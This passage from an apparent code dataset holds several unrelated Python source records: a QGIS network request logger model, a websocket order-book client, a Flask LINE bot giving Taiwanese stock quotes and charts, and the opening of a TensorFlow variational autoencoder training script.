QgsNetworkAccessManager.instance()\n\n # dictionary with all Requests (actually RequestParentItem's)\n # the requestId() of a QgsNetworkRequestParameters is the name/key in\n # this dictionary. This requestId is just an unique counter from the\n # NAM\n self.requests_items = {}\n\n # let us connect to all signals the NAM is throwing so we can react:\n self.nam.requestAboutToBeCreated[QgsNetworkRequestParameters]\\\n .connect(self.request_about_to_be_created)\n self.nam.finished[QgsNetworkReplyContent].connect(self.request_finished)\n self.nam.requestTimedOut[QgsNetworkRequestParameters]\\\n .connect(self.request_timed_out)\n self.nam.downloadProgress.connect(self.download_progress)\n self.nam.requestEncounteredSslErrors.connect(self.ssl_errors)\n\n # slot for nam.requestAboutToBeCreated[QgsNetworkRequestParameters]\n def request_about_to_be_created(self, request_params):\n child_count = len(self.root_item.children)\n self.beginInsertRows(QModelIndex(), child_count, child_count)\n self.requests_items[request_params.requestId()] = \\\n RequestParentItem(request_params, self.root_item)\n self.endInsertRows()\n\n if child_count > (NODES2RETAIN*1.2): # 20% more as buffer\n self.pop_nodes(child_count-NODES2RETAIN)\n\n # slot for nam.finished[QgsNetworkReplyContent]\n def request_finished(self, reply):\n if not reply.requestId() in self.requests_items:\n return\n request_item = self.requests_items[reply.requestId()]\n # find the row: the position of the RequestParentItem in the rootNode\n request_index = self.createIndex(request_item.position(), 0, request_item)\n self.beginInsertRows(request_index, len(request_item.children), len(request_item.children))\n request_item.set_reply(reply)\n self.endInsertRows()\n\n self.dataChanged.emit(request_index, request_index)\n\n # slot for nam.requestTimedOut[QgsNetworkRequestParameters]\n def request_timed_out(self, reply):\n if not reply.requestId() in self.requests_items:\n return\n request_item = self.requests_items[reply.requestId()]\n request_index = self.createIndex(request_item.position(), 0, request_item)\n request_item.set_timed_out()\n\n self.dataChanged.emit(request_index, request_index)\n\n # slot for nam.requestEncounteredSslErrors\n def ssl_errors(self, requestId, errors):\n if not requestId in self.requests_items:\n return\n request_item = self.requests_items[requestId]\n request_index = self.createIndex(request_item.position(), 0, request_item)\n self.beginInsertRows(request_index, len(request_item.children), len(request_item.children))\n request_item.set_ssl_errors(errors)\n self.endInsertRows()\n\n self.dataChanged.emit(request_index, request_index)\n\n # slot for nam.downloadProgress\n def download_progress(self, requestId, received, total):\n if not requestId in self.requests_items:\n return\n request_item = self.requests_items[requestId]\n request_index = self.createIndex(request_item.position(), 0, request_item)\n request_item.set_progress(received, total)\n\n self.dataChanged.emit(request_index, request_index, [Qt.ToolTipRole])\n\n def columnCount(self, parent):\n \"\"\"\n QAbstractItemModel interface: return the number of columns in the model\n for given parent. 
In this case: A QTreeView with just one column\n :param parent:\n :return: int column count\n \"\"\"\n return 1\n\n def rowCount(self, parent):\n \"\"\"\n Return the number of rows/children of this parent node\n\n :param parent:\n :return: int row count\n \"\"\"\n if parent.column() > 0:\n return 0\n parent_item = self.root_item if not parent.isValid() else parent.internalPointer()\n return len(parent_item.children)\n\n def data(self, index, role):\n \"\"\"\n Return the data of this node, used to style the items\n\n :param index:\n :param role:\n :return:\n \"\"\"\n if not index.isValid():\n return\n\n item = index.internalPointer()\n if role == Qt.DisplayRole:\n return item.text(index.column())\n elif role == Qt.ToolTipRole:\n return item.tooltip(index.column())\n elif role == STATUS_ROLE:\n return item.status\n elif role == Qt.ForegroundRole:\n if isinstance(item, RequestParentItem) and item.ssl_errors \\\n or isinstance(item, SslErrorsItem) \\\n or isinstance(index.parent().internalPointer(), SslErrorsItem):\n color = QColor(180, 65, 210)\n elif item.status in (PENDING, CANCELED):\n color = QColor(0, 0, 0, 100)\n elif item.status == ERROR:\n color = QColor(235, 10, 10)\n elif item.status == TIMEOUT:\n color = QColor(235, 10, 10)\n else:\n color = QColor(0, 0, 0)\n return QBrush(color)\n\n elif role == Qt.FontRole:\n f = QFont()\n if item.status == CANCELED:\n f.setStrikeOut(True)\n return f\n\n # not sure why this raises exceptions but commenting for now\n # is it used?\n # def flags(self, index):\n # if not index.isValid():\n # return 0\n # return Qt.ItemIsEnabled | Qt.ItemIsSelectable\n\n def index(self, row, column, parent_index):\n \"\"\"\n Get the QModelIndex of the given cell/item and it's parent index\n\n :param row:\n :param column:\n :param parent_index:\n :return: QModelIndex\n \"\"\"\n \n if not self.hasIndex(row, column, parent_index):\n return QModelIndex()\n\n parent_item = self.root_item if not parent_index.isValid() else parent_index.internalPointer()\n child_item = parent_item.children[row]\n return self.createIndex(row, column, child_item)\n\n def parent(self, index):\n \"\"\"\n Return the parent of given QModelIndex\n\n :param index:\n :return: QModelIndex\n \"\"\"\n if not index.isValid():\n return QModelIndex()\n\n parent_item = index.internalPointer().parent\n if parent_item.parent is None:\n return QModelIndex()\n\n parent_index_in_grandparent = parent_item.parent.children.index(parent_item)\n return self.createIndex(parent_index_in_grandparent, 0, parent_item)\n\n def headerData(self, section, orientation, role):\n if section == 0 and orientation == Qt.Horizontal and role == Qt.DisplayRole:\n return \"Requests\"\n\n def clear(self):\n \"\"\"\n Clear current model with Requests so we can start with a clean sheet.\n\n \"\"\"\n self.beginResetModel()\n self.root_item = RootItem()\n self.requests_items = {}\n self.endResetModel()\n\n def pause(self, state):\n \"\"\"\n Toggle the logging by temporary (dis)connecting the\n requestAboutToBeCreated signal from our\n request_about_to_be_created slot\n :param state:\n \"\"\"\n if state == self.is_paused:\n return\n\n self.is_paused = state\n if self.is_paused:\n QgsNetworkAccessManager.instance().requestAboutToBeCreated[QgsNetworkRequestParameters].disconnect(\n self.request_about_to_be_created)\n else:\n QgsNetworkAccessManager.instance().requestAboutToBeCreated[QgsNetworkRequestParameters].connect(\n self.request_about_to_be_created)\n\n def pop_nodes(self, count):\n \"\"\"\n Pop 'count' nodes from the list, to be able 
to retain a fixed size\n of items.\n\n :param count: int number of nodes to remove/pop\n \"\"\"\n log.debug('Removing {} Request nodes.'.format(count))\n self.beginRemoveRows(QModelIndex(), 0, count-1)\n if len(self.root_item.children) > 0:\n self.root_item.children = self.root_item.children[count:]\n self.endRemoveRows()\n\n\n\n\nclass ActivityProxyModel(QSortFilterProxyModel):\n \"\"\"\n The ActivityProxyModel is a QSortFilterProxyModel so we can make our\n QAbstractItemModel sortable / searchable\n\n \"\"\"\n def __init__(self, source_model, parent=None):\n super().__init__(parent)\n self.source_model = source_model\n self.setSourceModel(self.source_model)\n self.filter_string = ''\n self.show_successful = True\n self.show_timeouts = True\n\n def set_filter_string(self, string):\n self.filter_string = string\n self.invalidateFilter()\n\n def set_show_successful(self, show):\n self.show_successful = show\n self.invalidateFilter()\n\n def set_show_timeouts(self, show):\n self.show_timeouts = show\n self.invalidateFilter()\n\n def filterAcceptsRow(self, sourceRow, sourceParent):\n item = self.source_model.index(sourceRow, 0, sourceParent).internalPointer()\n if isinstance(item, RequestParentItem):\n if item.status in (COMPLETE, CANCELED) and not self.show_successful:\n return False\n elif item.status == TIMEOUT and not self.show_timeouts:\n return False\n\n return self.filter_string.lower() in item.url.url().lower()\n else:\n return True\n\n\n\nclass ActivityTreeItem(object):\n \"\"\"\n Parent class of all ActivityTreeItems sub classes.\n An ActivityTreeItems is kept in the ActivityModel and able to keep the\n information of it's NetworkActivity counter part\n \"\"\"\n\n def __init__(self, parent=None):\n self.parent = parent\n self.children = []\n if parent:\n parent.children.append(self)\n\n self.status = COMPLETE\n\n def text(self, column):\n return ''\n\n def tooltip(self, column):\n return self.text(column)\n\n def createWidget(self):\n return None\n\n def actions(self):\n return []\n\n def operation2string(self, operation):\n \"\"\" Create http-operation String from Operation\n\n :param operation: QNetworkAccessManager.Operation\n :return: string\n \"\"\"\n op = \"Custom\"\n if operation == QNetworkAccessManager.HeadOperation:\n op = \"HEAD\"\n elif operation == QNetworkAccessManager.GetOperation:\n op = \"GET\"\n elif operation == QNetworkAccessManager.PutOperation:\n op = \"PUT\"\n elif operation == QNetworkAccessManager.PostOperation:\n op = \"POST\"\n elif operation == QNetworkAccessManager.DeleteOperation:\n op = \"DELETE\"\n return op\n\n def position(self):\n \"\"\"\n Return the place of myself in the list of children of my parent.\n Needed to create an index of myself.\n :return: int\n \"\"\"\n # (this to be able to let the model know my 'row')\n if self.parent and self in self.parent.children:\n return self.parent.children.index(self)\n return 0\n\n\nclass RootItem(ActivityTreeItem):\n \"\"\"\n 'Invisible' root of the QTreeView\n \"\"\"\n def __init__(self, parent=None):\n super().__init__(parent)\n\n\nclass RequestParentItem(ActivityTreeItem):\n \"\"\"\n Every Request going via the NetworkAccessManager (NAM) fires a\n RequestAboutToCreated signal upon we create this RequestParentItem which\n acts as the parent of all information (both request AND later response) of\n this Request\n \"\"\"\n def __init__(self, request, parent=None):\n super().__init__(parent)\n self.url = request.request().url()\n self.id = request.requestId()\n self.operation = 
self.operation2string(request.operation())\n self.time = time.time()\n self.http_status = -1\n self.content_type = ''\n self.progress = None\n self.headers = []\n self.replies = 0\n self.data = request.content().data().decode('utf-8')\n for header in request.request().rawHeaderList():\n self.headers.append(\n (header.data().decode('utf-8'),\n request.request().rawHeader(header).data().decode('utf-8')))\n\n RequestItem(request, self)\n\n self.status = PENDING\n self.ssl_errors = False\n\n self.open_url_action = QAction('Open URL')\n self.open_url_action.triggered.connect(self.open_url)\n\n self.copy_as_curl_action = QAction('Copy as cURL')\n self.copy_as_curl_action.triggered.connect(self.copy_as_curl)\n\n def text(self, column):\n if column == 0:\n # id is the NAM id\n return '{} {} {}'.format(self.id, self.operation, self.url.url())\n return ''\n\n def open_url(self):\n \"\"\"Open (GET) the url of this RequestParentItem in the default browser\n of the user\"\"\"\n QDesktopServices.openUrl(self.url)\n\n def copy_as_curl(self):\n \"\"\"Get url + headers + data and create a full curl command\n Copy that to clipboard\n \"\"\"\n curl_headers = ''\n for header, value in self.headers:\n curl_headers += \"-H '{}: {}' \".format(header, value)\n curl_data = ''\n if self.operation in ('POST', 'PUT'):\n curl_data = \"--data '{}' \".format(self.data)\n curl_cmd = \"curl '{}' {} {}--compressed\".format(self.url.url(), curl_headers, curl_data)\n QApplication.clipboard().setText(curl_cmd)\n\n def set_reply(self, reply):\n if reply.error() == QNetworkReply.OperationCanceledError:\n self.status = CANCELED\n elif reply.error() != QNetworkReply.NoError:\n self.status = ERROR\n else:\n self.status = COMPLETE\n self.time = int((time.time() - self.time) * 1000)\n self.http_status = reply.attribute(QNetworkRequest.HttpStatusCodeAttribute)\n self.content_type = reply.rawHeader(b'Content-Type').data().decode('utf-8')\n ReplyItem(reply, self)\n\n def set_timed_out(self):\n self.status = TIMEOUT\n\n def set_progress(self, received, total):\n self.replies += 1\n self.progress = (received, total)\n\n def set_ssl_errors(self, errors):\n self.ssl_errors = errors\n SslErrorsItem(errors, self)\n\n def actions(self):\n return [self.open_url_action, self.copy_as_curl_action]\n\n def tooltip(self, column):\n bytes = 'unknown'\n if self.progress:\n rec, tot = self.progress\n if rec > 0 and rec < tot:\n bytes = '{}/{}'.format(rec, tot)\n elif rec > 0 and rec == tot:\n bytes = '{}'.format(tot)\n # ?? adding
a line break instead of \\n after (very long) url seems to break url up\n # example output: COMPLETE, Status: 200 - text/xml; charset=utf-8 - 2334 bytes - 657 milliseconds\n return \"{}
{} - Status: {} - {} - {} bytes - {} msec - {} replies\" \\\n .format(self.url.url(), self.status, self.http_status, self.content_type, bytes, self.time, self.replies)\n\n\nclass RequestItem(ActivityTreeItem):\n def __init__(self, request, parent=None):\n super().__init__(parent)\n\n self.url = request.request().url()\n self.operation = self.operation2string(request.operation())\n query = QUrlQuery(self.url)\n RequestDetailsItem('Operation', self.operation, self)\n RequestDetailsItem('Thread', request.originatingThreadId(), self)\n RequestDetailsItem('Initiator', request.initiatorClassName() if request.initiatorClassName() else 'unknown',\n self)\n if request.initiatorRequestId():\n RequestDetailsItem('ID', str(request.initiatorRequestId()), self)\n\n RequestDetailsItem('Cache (control)', self.cache_control_to_string(\n request.request().attribute(QNetworkRequest.CacheLoadControlAttribute)), self)\n RequestDetailsItem('Cache (save)', 'Can store result in cache' if request.request().attribute(\n QNetworkRequest.CacheSaveControlAttribute) else 'Result cannot be stored in cache', self)\n\n query_items = query.queryItems()\n if query_items:\n RequestQueryItems(query_items, self)\n RequestHeadersItem(request, self)\n if self.operation in ('POST', 'PUT'):\n PostContentItem(request, self)\n\n @staticmethod\n def cache_control_to_string(cache_control_attribute):\n if cache_control_attribute == QNetworkRequest.AlwaysNetwork:\n return 'Always load from network, do not check cache'\n elif cache_control_attribute == QNetworkRequest.PreferNetwork:\n return 'Load from the network if the cached entry is older than the network entry'\n elif cache_control_attribute == QNetworkRequest.PreferCache:\n return 'Load from cache if available, otherwise load from network'\n elif cache_control_attribute == QNetworkRequest.AlwaysCache:\n return 'Only load from cache, error if no cached entry available'\n return None\n\n def text(self, column):\n return 'Request' if column == 0 else ''\n\n\nclass RequestDetailsItem(ActivityTreeItem):\n def __init__(self, description, value, parent=None):\n super().__init__(parent)\n\n self.description = description\n self.value = value\n\n def text(self, column):\n if column == 0:\n #return self.description\n return '{:30}: {}'.format(self.description, self.value)\n else:\n return self.value\n\n\nclass RequestHeadersItem(ActivityTreeItem):\n def __init__(self, request, parent=None):\n super().__init__(parent)\n\n for header in request.request().rawHeaderList():\n RequestDetailsItem(header.data().decode('utf-8'),\n request.request().rawHeader(header).data().decode('utf-8'), self)\n\n def text(self, column):\n if column == 0:\n return 'Headers'\n else:\n return ''\n\n\nclass RequestQueryItems(ActivityTreeItem):\n def __init__(self, query_items, parent=None):\n super().__init__(parent)\n\n for item in query_items:\n RequestDetailsItem(item[0], item[1], self)\n\n def text(self, column):\n if column == 0:\n return 'Query'\n else:\n return ''\n\n\nclass PostContentItem(ActivityTreeItem):\n # request = QgsNetworkRequestParameters\n def __init__(self, request, parent=None):\n super().__init__(parent)\n\n # maybe should be &?\n # for p in request.content().data().decode('utf-8').split('&'):\n # PostDetailsItem(p, self)\n\n data = request.content().data().decode('utf-8')\n PostDetailsItem(data, self)\n\n def text(self, column):\n if column == 0:\n return 'Content'\n else:\n return ''\n\n\nclass PostDetailsItem(ActivityTreeItem):\n def __init__(self, part, parent=None):\n 
super().__init__(parent)\n\n # self.description, self.value = part.split('=')\n self.data = part\n\n def text(self, column):\n if column == 0:\n #return 'Data'\n return '{:30}: {}'.format('Data', self.data)\n else:\n return self.data\n\n\nclass ReplyItem(ActivityTreeItem):\n def __init__(self, reply, parent=None):\n super().__init__(parent)\n ReplyDetailsItem('Status', reply.attribute(QNetworkRequest.HttpStatusCodeAttribute), self)\n if reply.error() != QNetworkReply.NoError:\n ReplyDetailsItem('Error Code', reply.error(), self)\n ReplyDetailsItem('Error', reply.errorString(), self)\n\n RequestDetailsItem('Cache (result)', 'Used entry from cache' if reply.attribute(\n QNetworkRequest.SourceIsFromCacheAttribute) else 'Read from network', self)\n\n ReplyHeadersItem(reply, self)\n\n def text(self, column):\n return 'Reply' if column == 0 else ''\n\n\nclass ReplyHeadersItem(ActivityTreeItem):\n def __init__(self, reply, parent=None):\n super().__init__(parent)\n\n for header in reply.rawHeaderList():\n ReplyDetailsItem(header.data().decode('utf-8'),\n reply.rawHeader(header).data().decode('utf-8'), self)\n\n def text(self, column):\n if column == 0:\n return 'Headers'\n else:\n return ''\n\n\nclass ReplyDetailsItem(ActivityTreeItem):\n def __init__(self, description, value, parent=None):\n super().__init__(parent)\n\n self.description = description\n self.value = value\n\n def text(self, column):\n if column == 0:\n #return self.description\n return '{:30}: {}'.format(self.description, self.value)\n else:\n return self.value\n\n\nclass SslErrorsItem(ActivityTreeItem):\n def __init__(self, errors, parent=None):\n super().__init__(parent)\n for error in errors:\n ReplyDetailsItem('Error',\n error.errorString(), self)\n\n def text(self, column):\n if column == 0:\n return 'SSL errors'\n else:\n return ''\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":24639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"216542998","text":"import abc\nimport asyncio\nimport time\nimport json\nimport sys\nfrom socket import error as socket_error\nfrom pprint import pprint, pformat\n\nimport websockets\nfrom websockets import ConnectionClosed\n\nfrom defines import ASK, BID\nfrom orderbook import OrderBook\nfrom utils.logger import get_logger\n\nLOG = get_logger('WebSocketAPI', 'wss.log')\n\nwrite = sys.stdout.write\nflush = sys.stdout.flush\n\nclass WebSocketAPI(object):\n stores = {}\n \n def __init__(self, pair, url, payload):\n self.url = url\n self.payload = payload\n self.pair = pair\n self.l2_book = OrderBook(pair)\n \n def __repr__(self):\n return pformat(self.stores)\n \n @property\n def name(self):\n return self.__class__.__name__\n \n async def connect(self):\n async with websockets.connect(self.url) as websocket:\n await websocket.send(json.dumps(self.payload))\n \n while True:\n # 비동기가 아닌 경우 수신된 메시지가 없을 때 sleep을 해줘야 GIL이 해제되지만,\n # await 키워드를 사용하는 경우는 어떻게 되는 건지?\n message = await websocket.recv()\n await self.message_handler(message)\n await self.book_callback()\n \n async def book_callback(self):\n name = self.name\n book = self.l2_book\n self.stores.update({name: book})\n print(self)\n \n @abc.abstractmethod\n async def message_handler(self, message):\n '웹소켓 메시지 핸들러'\n","sub_path":"websocketapi.py","file_name":"websocketapi.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"638334803","text":"# -*- coding: utf-8 
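The WebSocketAPI record above leaves message_handler abstract: connect() opens the socket with the websockets package, sends the subscribe payload once, then feeds every received frame to the handler and re-publishes the order book. A minimal concrete subclass might look like the sketch below; the endpoint URL and subscribe payload are placeholders rather than a real exchange API, and it assumes the WebSocketAPI and OrderBook modules above are importable:

```python
import asyncio
import json

# Hypothetical feed built on the WebSocketAPI class above; the endpoint and
# subscribe payload are placeholders, not a real exchange API.
class PrintingFeed(WebSocketAPI):
    async def message_handler(self, message):
        # Frames arrive as text; a real handler would update self.l2_book
        # here instead of just printing the decoded payload.
        print(json.loads(message))

feed = PrintingFeed(pair="BTC-USD",
                    url="wss://example.com/stream",
                    payload={"op": "subscribe", "pair": "BTC-USD"})
# asyncio.get_event_loop().run_until_complete(feed.connect())  # placeholder URL
```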
-*-\n\nfrom __future__ import unicode_literals\nfrom linebot.models import *\nfrom linebot.exceptions import (\n InvalidSignatureError\n)\nfrom linebot import (\n LineBotApi, WebhookParser\n)\nfrom flask import Flask, request, abort\nfrom imgurpython import ImgurClient\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nimport os\nimport random\nimport time\nfrom datetime import timedelta, datetime\nfrom pymongo import MongoClient\n\n# ref: http://twstock.readthedocs.io/zh_TW/latest/quickstart.html#id2\nimport twstock\n\nimport matplotlib\nmatplotlib.use('Agg') # ref: https://matplotlib.org/faq/howto_faq.html\n\n\napp = Flask(__name__)\n\n\nchannel_secret_8 = os.environ.get(\"CHANNEL_SECRET\")\nchannel_access_token_8 = os.environ.get(\"CHANNEL_ACCESS_TOKEN\")\n\nline_bot_api_8 = LineBotApi(channel_access_token_8) # 傳送\nparser_8 = WebhookParser(channel_secret_8) # 接收\n\n\n# ===================================================\n# stock bot\n# ===================================================\n@app.route(\"/callback_yangbot8\", methods=['POST'])\ndef callback_yangbot8():\n signature = request.headers['X-Line-Signature']\n\n # get request body as text\n body = request.get_data(as_text=True)\n app.logger.info(\"Request body: \" + body)\n\n # parse webhook body\n try:\n events = parser_8.parse(body, signature) \n except InvalidSignatureError:\n abort(400)\n\n for event in events:\n if not isinstance(event, MessageEvent): # 判斷是否為訊息事件\n continue\n if not isinstance(event.message, TextMessage): # 判斷是否為文字\n continue\n\n text = event.message.text\n #userId = event['source']['userId']\n if(text.lower() == 'me'):\n content = str(event.source.user_id)\n\n line_bot_api_8.reply_message(\n event.reply_token,\n TextSendMessage(text=content)\n )\n elif(text.lower() == 'profile'):\n profile = line_bot_api_8.get_profile(event.source.user_id)\n my_status_message = profile.status_message\n if not my_status_message:\n my_status_message = '-'\n line_bot_api_8.reply_message(\n event.reply_token, [\n TextSendMessage(\n text='Display name: ' + profile.display_name\n ),\n TextSendMessage(\n text='picture url: ' + profile.picture_url\n ),\n TextSendMessage(\n text='status_message: ' + my_status_message\n ),\n ]\n )\n\n elif(text.startswith('#')):\n text = text[1:]\n content = ''\n\n stock_rt = twstock.realtime.get(text)\n my_datetime = datetime.fromtimestamp(stock_rt['timestamp']+8*60*60)\n my_time = my_datetime.strftime('%H:%M:%S')\n\n content += '%s (%s) %s\\n' % (\n stock_rt['info']['name'],\n stock_rt['info']['code'],\n my_time)\n content += '現價: %s / 開盤: %s\\n' % (\n stock_rt['realtime']['latest_trade_price'],\n stock_rt['realtime']['open'])\n content += '最高: %s / 最低: %s\\n' % (\n stock_rt['realtime']['high'],\n stock_rt['realtime']['low'])\n content += '量: %s\\n' % (stock_rt['realtime']\n ['accumulate_trade_volume'])\n\n stock = twstock.Stock(text) # twstock.Stock('2330')\n content += '-----\\n'\n content += '最近五日價格: \\n'\n price5 = stock.price[-5:][::-1]\n date5 = stock.date[-5:][::-1]\n for i in range(len(price5)):\n #content += '[%s] %s\\n' %(date5[i].strftime(\"%Y-%m-%d %H:%M:%S\"), price5[i])\n content += '[%s] %s\\n' % (date5[i].strftime(\"%Y-%m-%d\"),\n price5[i])\n line_bot_api_8.reply_message(\n event.reply_token,\n TextSendMessage(text=content)\n )\n\n elif(text.startswith('/')):\n text = text[1:]\n fn = '%s.png' % (text)\n stock = twstock.Stock(text)\n my_data = {'close': stock.close,\n 'date': stock.date, 'open': stock.open}\n df1 = pd.DataFrame.from_dict(my_data)\n\n df1.plot(x='date', 
y='close')\n plt.title('[%s]' %(stock.sid))\n plt.savefig(fn)\n plt.close()\n\n # -- upload\n # imgur with account: your.mail@gmail.com\n client_id = os.environ.get(\"IMGUR_ID\")\n client_secret = os.environ.get(\"IMGUR_SECRET\")\n\n client = ImgurClient(client_id, client_secret)\n print(\"Uploading image... \")\n image = client.upload_from_path(fn, anon=True)\n print(\"Done\")\n\n url = image['link']\n image_message = ImageSendMessage(\n original_content_url=url,\n preview_image_url=url\n )\n\n line_bot_api_8.reply_message(\n event.reply_token,\n image_message\n )\n\n elif(text.startswith('$')):\n text = text[1:]\n print(text)\n stock = twstock.Stock(text)\n bfp = twstock.BestFourPoint(stock)\n\n print(bfp.best_four_point())\n content = \"建議做多,因為:\\n\" if bfp.best_four_point()[\n 0] else \"建議放空,因為:\\n\"\n content += bfp.best_four_point()[1]\n\n line_bot_api_8.reply_message(\n event.reply_token,\n TextSendMessage(text=content)\n )\n \n else:\n content = \"歡迎使用STOCK股票小精靈!( ^ω^)\\n基礎功能請輸入:\\n#股票代號 查詢即時股價。\\n/股票代號 觀看股票線圖。\\n$股票代號 觀看簡單分析。\"\n line_bot_api_8.reply_message(\n event.reply_token,\n TextSendMessage(text=content)\n )\n\n return 'OK'\n\n\n@app.route(\"/\", methods=['GET'])\ndef basic_url():\n return 'OK'\n\n\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":6275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"56269924","text":"# !usr/bin/env python\n# -*- coding:utf-8 -*-\n\nimport tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow.contrib.layers import batch_norm\nfrom tensorflow.contrib.layers import l2_regularizer\nfrom tensorflow.contrib.layers import l1_regularizer\n\n#os.environ['CUDA_VISIBLE_DEVICES']='1'\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\n\nclass LatentAttention():\n def __init__(self):\n #self.n_hidden = 500\n self.n_z = 62\n self.batchsize = 64\n self.inputDim=3686\n self.compressDims=[1024,512,self.n_z]\n self.decompressDims=[512,1024,3686]\n self.vaeActivation=tf.nn.relu\n self.epoches=501\n self.l1scale=0.1\n self.l2scale=0.1\n\n def load_data(self):\n f = open(\"/home/deermini/PycharmProjects/medical-analysis/GAN_for_medical_2/gene_data/index_label.txt\")\n index = []\n for li in f.readlines():\n index.append(int(li.split()[0]))\n f.close()\n\n data = np.load(\n \"/home/deermini/PycharmProjects/medical-analysis/GAN_for_medical_2/gene_data/data_to_gene/True_data.npy\")\n data_weights = data[:, 1961];data_x = data[:, :1960];data_y = data[:, 1962:]\n data_y = data_y[:, index]\n data = np.hstack((data_x, data_y))\n\n return data\n\n def print2file(self, buf, outFile):\n outfd = open(outFile, 'a')\n outfd.write(buf + '\\n')\n outfd.close()\n\n # encoder\n def recognition(self, x_input,reuse=False,is_training=True):\n with tf.variable_scope(\"recognition\",reuse=reuse,regularizer=l2_regularizer(self.l2scale)):\n tempVec = x_input\n tempDim = self.inputDim\n i = 0\n for compressDim in self.compressDims[:-1]:\n W = tf.get_variable('vaee_W_' + str(i), shape=[tempDim, compressDim],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('vaee_b_' + str(i), shape=[compressDim])\n tempVec = self.vaeActivation(tf.add(tf.matmul(tempVec, W),b))\n tempDim = compressDim\n i += 1\n W = tf.get_variable('vaee_W_' + str(i), shape=[tempDim, self.compressDims[-1]],\n initializer=tf.contrib.layers.xavier_initializer())\n b = 
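The stock bot above leans entirely on twstock: realtime.get() for the quote behind '#', Stock() for the price history behind '/', and BestFourPoint for the '$' recommendation. The same three calls in isolation (2330 is just an example ticker; the real-time call needs network access and live market data):

```python
import twstock

# Real-time quote: a nested dict with 'info' and 'realtime' sections,
# exactly the keys the '#' handler above reads.
rt = twstock.realtime.get("2330")
print(rt["info"]["name"], rt["realtime"]["latest_trade_price"])

# Historical data: parallel date/price lists, newest entries last.
stock = twstock.Stock("2330")
for day, close in zip(stock.date[-5:], stock.price[-5:]):
    print(day.strftime("%Y-%m-%d"), close)

# Best-four-point analysis: a truthy first element suggests buying,
# a falsy one suggests selling; the second element is the reason string.
bfp = twstock.BestFourPoint(stock)
print(bfp.best_four_point())
```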
tf.get_variable('vaee_b_' + str(i), shape=[self.compressDims[-1]])\n mean=tf.add(tf.matmul(tempVec, W),b)\n W = tf.get_variable('vaee_W_' + str(i+1), shape=[tempDim, self.compressDims[-1]],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('vaee_b_' + str(i+1), shape=[self.compressDims[-1]])\n stddev= tf.add(tf.matmul(tempVec, W), b)\n stddev = 1e-6 + tf.nn.softplus(stddev)\n return mean,stddev\n\n # decoder\n def generation(self, z,reuse=False,is_training=True):\n with tf.variable_scope(\"generation\",reuse=reuse,regularizer=l2_regularizer(self.l2scale)):\n i = 0;tempDim=self.n_z\n tempVec=z\n for decompressDim in self.decompressDims[:-1]:\n W = tf.get_variable('vaed_W_' + str(i), shape=[tempDim, decompressDim],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('vaed_b_' + str(i), shape=[decompressDim])\n tempVec=tf.add(tf.matmul(tempVec,W),b)\n tempVec = self.vaeActivation(tempVec)\n tempDim = decompressDim\n i += 1\n W = tf.get_variable('vaed_W_' + str(i), shape=[tempDim, self.decompressDims[-1]],\n initializer=tf.contrib.layers.xavier_initializer())\n b = tf.get_variable('vaed_b_' + str(i), shape=[self.decompressDims[-1]])\n x_reconst = tf.nn.sigmoid(tf.add(tf.matmul(tempVec, W),b))\n return x_reconst\n\n\n def train(self,\n path='/home/deermini/PycharmProjects/medical-analysis/GAN for medical/input_data.npy',\n saveMaxKeep=0\n ):\n with tf.name_scope(\"input_data\"):\n self.inputs = tf.placeholder(tf.float32, [None, self.inputDim])\n\n z_mean, z_stddev = self.recognition(self.inputs)\n samples = tf.random_normal([self.batchsize, self.n_z], 0, 1, dtype=tf.float32)\n\n \"\"\"版本1\"\"\"\n guessed_z = z_mean + (z_stddev * samples)\n generated_outputs = self.generation(guessed_z)\n\n with tf.name_scope(\"generation_loss\"):\n self.generation_loss = -tf.reduce_mean(tf.reduce_sum(\n self.inputs * tf.log(tf.clip_by_value(generated_outputs, 1e-8, 1 - 1e-8)) + (1 - self.inputs) * tf.log(\n 1 - tf.clip_by_value(generated_outputs, 1e-8, 1 - 1e-8)),1))\n tf.summary.scalar(\"gene_loss\",self.generation_loss)\n\n with tf.name_scope(\"KL_Loss\"):\n self.latent_loss = tf.reduce_mean(0.5 * tf.reduce_sum(\n tf.square(z_mean) + tf.square(z_stddev) - tf.log(1e-8+tf.square(z_stddev))-1,1))\n tf.summary.scalar(\"klloss\",self.latent_loss)\n\n\n \"\"\"版本2\"\"\"\n # guessed_z = z_mean + tf.exp(z_stddev/2) * samples\n # generated_outputs = self.generation(guessed_z)\n # self.generated_outputs = tf.clip_by_value(generated_outputs, 1e-8, 1 - 1e-8)\n #\n # self.generation_loss = -tf.reduce_sum(\n # self.inputs * tf.log(self.generated_outputs) + (1 - self.inputs) * tf.log(\n # 1 - self.generated_outputs), 1)\n #\n # self.latent_loss = 0.5 * tf.reduce_sum(\n # tf.square(z_mean) + tf.exp(z_stddev) - z_stddev - 1, 1)\n\n with tf.name_scope(\"cost\"):\n self.lamda=10\n self.cost =self.generation_loss + self.lamda*self.latent_loss\n tf.summary.scalar(\"cost\", self.cost)\n\n regular_loss=tf.reduce_mean(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES))\n t_vars = tf.trainable_variables()\n self.optimizer = tf.train.AdamOptimizer(learning_rate=0.0001).minimize(self.cost+regular_loss,var_list=t_vars)\n\n merged = tf.summary.merge_all()\n #writer = tf.summary.FileWriter(\"log/\",tf.get_default_graph())\n saver = tf.train.Saver(max_to_keep=saveMaxKeep)\n if not os.path.exists(\"result\"):\n os.makedirs(\"result\")\n logFile = \"result/result.txt\"\n data = self.load_data()\n nbatches = int(data.shape[0] / self.batchsize)\n\n config = tf.ConfigProto()\n 
